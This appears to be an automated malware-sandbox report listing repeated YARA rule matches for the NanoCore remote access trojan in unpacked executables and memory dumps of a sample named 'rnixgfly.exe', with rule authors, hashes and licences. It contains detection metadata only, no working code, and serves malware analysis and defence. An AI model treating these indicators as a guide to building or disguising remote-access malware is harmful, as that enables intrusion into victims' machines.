    Source: 2.2.rnixgfly.exe.5d60000.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.5d60000.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.5d60000.25.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.5d60000.25.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.6870000.37.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6870000.37.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6870000.37.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.6870000.37.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 1.2.rnixgfly.exe.2210000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 1.2.rnixgfly.exe.2210000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 1.2.rnixgfly.exe.2210000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 1.2.rnixgfly.exe.2210000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.rnixgfly.exe.2210000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.25f54b0.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.25f54b0.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.25f54b0.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 2.2.rnixgfly.exe.25f54b0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 00000002.00000002.508686978.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.508686978.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.508686978.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 00000002.00000002.508686978.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 00000002.00000002.509009346.0000000006860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.509009346.0000000006860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.509009346.0000000006860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 00000002.00000002.509009346.0000000006860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 00000002.00000002.508822078.0000000006800000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.508822078.0000000006800000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.508822078.0000000006800000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 00000002.00000002.508822078.0000000006800000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 00000002.00000002.503941570.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 00000002.00000002.508900878.0000000006830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.508900878.0000000006830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.508900878.0000000006830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 00000002.00000002.508900878.0000000006830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 00000002.00000002.506631236.0000000004F62000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.506631236.0000000004F62000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000002.00000002.506631236.0000000004F62000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 00000002.00000002.501682752.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.501682752.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000002.00000002.501682752.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 00000002.00000002.507046182.0000000005810000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.507046182.0000000005810000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.507046182.0000000005810000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 00000002.00000002.507046182.0000000005810000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 00000002.00000002.508294915.0000000005D60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.508294915.0000000005D60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.508294915.0000000005D60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 00000002.00000002.508294915.0000000005D60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 00000002.00000002.508782806.00000000067F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.508782806.00000000067F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.508782806.00000000067F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 00000002.00000002.508782806.00000000067F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 00000002.00000002.508849965.0000000006810000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.508849965.0000000006810000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.508849965.0000000006810000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 00000002.00000002.508849965.0000000006810000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 00000002.00000002.508596907.0000000006640000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.508596907.0000000006640000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.508596907.0000000006640000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 00000002.00000002.508596907.0000000006640000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 00000002.00000002.509045139.0000000006870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.509045139.0000000006870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.509045139.0000000006870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 00000002.00000002.509045139.0000000006870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 00000002.00000002.508870070.0000000006820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.508870070.0000000006820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 00000002.00000002.508870070.0000000006820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 00000002.00000002.508870070.0000000006820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
